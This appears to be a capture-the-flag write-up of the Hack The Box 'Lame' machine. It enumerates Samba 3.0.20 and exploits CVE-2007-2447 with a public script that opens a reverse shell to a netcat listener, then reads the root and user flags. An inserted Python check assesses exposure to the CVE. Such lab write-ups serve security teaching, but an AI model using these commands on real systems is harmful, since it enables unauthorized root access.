Discovery
NMAP
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ sudo nmap -sC -sV 10.10.10.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 20:25 BST
Nmap scan report for 10.10.10.3
Host is up (0.0054s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-06-23T15:25:54-04:00
|_clock-skew: mean: 2h00m23s, deviation: 2h49m44s, median: 21s
FTP
Connected to FTP anonymously; there doesn’t appear to be anything there (the only directories were . and .., and navigating around didn’t show anything promising).
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
SMB
SMBMap seems to find something interesting in tmp (‘oh noes!’, probably because it’s anonymous read/write):
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
A recursive file search shows a few files inside tmp:
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ smbmap -R -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
.\tmp\*
dr--r--r-- 0 Thu Jun 23 20:55:02 2022 .
dw--w--w-- 0 Sat Oct 31 06:33:57 2020 ..
dr--r--r-- 0 Thu Jun 23 20:47:03 2022 .ICE-unix
dw--w--w-- 0 Thu Jun 23 20:47:31 2022 vmware-root
dr--r--r-- 0 Thu Jun 23 20:47:28 2022 .X11-unix
fw--w--w-- 11 Thu Jun 23 20:47:28 2022 .X0-lock
fw--w--w-- 0 Thu Jun 23 20:48:05 2022 5563.jsvc_up
fw--w--w-- 1600 Thu Jun 23 20:47:01 2022 vgauthsvclog.txt.0
.\tmp\.X11-unix\*
dr--r--r-- 0 Thu Jun 23 20:47:28 2022 .
dr--r--r-- 0 Thu Jun 23 20:55:02 2022 ..
fr--r--r-- 0 Thu Jun 23 20:47:28 2022 X0
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
This command will allow us to download files. vgauth stood out, but perhaps I’m not looking at the right thing, as it is empty:
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ gedit 10.10.10.3-tmpvgauthsvclog.txt.0
Exploitation
SAMBA
We saw that the server itself is running 3.0.20 (Samba) so let’s read about any potential exploits.
Identified this link: CVE-2007-2447
The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the “username map script” smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
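A defender’s check for the two conditions the CVE description above names, written for this writeup (not the author’s code or the exploit script): it parses the Samba version as nmap reports it, compares it to the affected range 3.0.0 through 3.0.25rc3 (release candidates sorting below the final release), and looks for an active username map script line in smb.conf. The smb.conf fragment is constructed for the example; the target’s real configuration is not shown on this page.

```python
import re

# Samba version as nmap prints it ("Samba smbd 3.0.20-Debian"), optional rcN suffix.
SAMBA_VERSION_RE = re.compile(
    r"Samba\s+(?:smbd\s+)?(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", re.IGNORECASE)
# An active (uncommented) "username map script" line in smb.conf.
USERNAME_MAP_SCRIPT_RE = re.compile(
    r"^[ \t]*username[ \t]+map[ \t]+script[ \t]*=[ \t]*(\S.*?)[ \t]*$",
    re.IGNORECASE | re.MULTILINE)

def parse_version(text):
    """First Samba version in text as a comparable tuple (rc sorts below final)."""
    m = SAMBA_VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    pre = (0, int(rc)) if rc else (1, 0)  # 3.0.25rc3 -> (3,0,25,0,3) < 3.0.25
    return (int(major), int(minor), int(patch)) + pre

# Affected range from the CVE-2007-2447 description: 3.0.0 through 3.0.25rc3.
AFFECTED_MIN = parse_version("Samba 3.0.0")
AFFECTED_MAX = parse_version("Samba 3.0.25rc3")

def version_affected(version):
    return version is not None and AFFECTED_MIN <= version <= AFFECTED_MAX

def username_map_script(smb_conf):
    """Configured script path, or None when the option is not set."""
    m = USERNAME_MAP_SCRIPT_RE.search(smb_conf)
    return m.group(1) if m else None

def assess(nmap_output, smb_conf):
    """Rate CVE-2007-2447 exposure from the advertised version and the config."""
    version = parse_version(nmap_output)
    script = username_map_script(smb_conf)
    affected = version_affected(version)
    if affected and script:
        risk = "HIGH: unauthenticated command execution via SamrChangePassword"
    elif affected:
        risk = "MEDIUM: authenticated command execution via printer/share management"
    else:
        risk = "LOW: version outside the affected range"
    return {"version": version, "username_map_script": script,
            "affected": affected, "risk": risk}

# Constructed sample input: the 445/tcp line from the scan above, plus an
# smb.conf fragment written for this example (the target's own is not shown).
NMAP_LINE = "445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)"
SAMPLE_SMB_CONF = "[global]\n   ; username map script = /old.sh\n" \
                  "   username map script = /etc/samba/scripts/mapusers.sh\n"
```

Remediation for either rating is the same: upgrade past 3.0.25rc3 and drop the username map script option unless it is needed.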
Performed some searchsploit checks and found this as well: Link
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ searchsploit samba 3.0.20
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Securi | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map scr | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ searchsploit -p 16320
Exploit: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16320
Path: /usr/share/exploitdb/exploits/unix/remote/16320.rb
File Type: Ruby script, ASCII text
Copied EDB-ID #16320's path to the clipboard
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ searchsploit -w 16320
---------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
---------------------------------------------------------------------------- --------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasp | https://www.exploit-db.com/exploits/16320
---------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
Looks like these are all Metasploit, and we’re trying to avoid its usage for the exam. Found a GitHub Python script to do the manual exploitation: Link
This video explains how to walk through exploitation (both manual and via Metasploit): Link
The first attempt was a failure because I had not installed the pysmb module needed to import SMBConnection:
└──╼ [★]$ python -m pip install pysmb
Collecting pysmb
Downloading pysmb-1.2.8.zip (1.3 MB)
|████████████████████████████████| 1.3 MB 5.3 MB/s
---
Successfully built pysmb
Installing collected packages: pysmb
Successfully installed pysmb-1.2.8
Ran the script with the appropriate parameters, all while running a netcat listener in a separate terminal, and can see that the connection was established:
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~/CVE-2007-2447]
└──╼ [★]$ python3 usermap_script.py 10.10.10.3 445 10.10.14.8 5000
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~/CVE-2007-2447]
└──╼ [★]$ nc -nvlp 5000
listening on [any] 5000 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.3] 34178
Privilege Escalation
- Identified the Linux version/type via uname (GNU)
- Identified the current user (root)
- Ran a find search to locate ‘user.txt’ (which is typically our user flag)
- Cat’d out user.txt and pulled the flag
- Cd’d back out into the root user folder and saw root.txt
- Cat’d out root.txt and pulled the flag
whoami
root
uname -a
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
find /* -name user.txt
/home/makis/user.txt
cat /home/makis/user.txt
[redacted]
find /* -name root.txt
/root/root.txt
cat /root/root.txt
[redacted]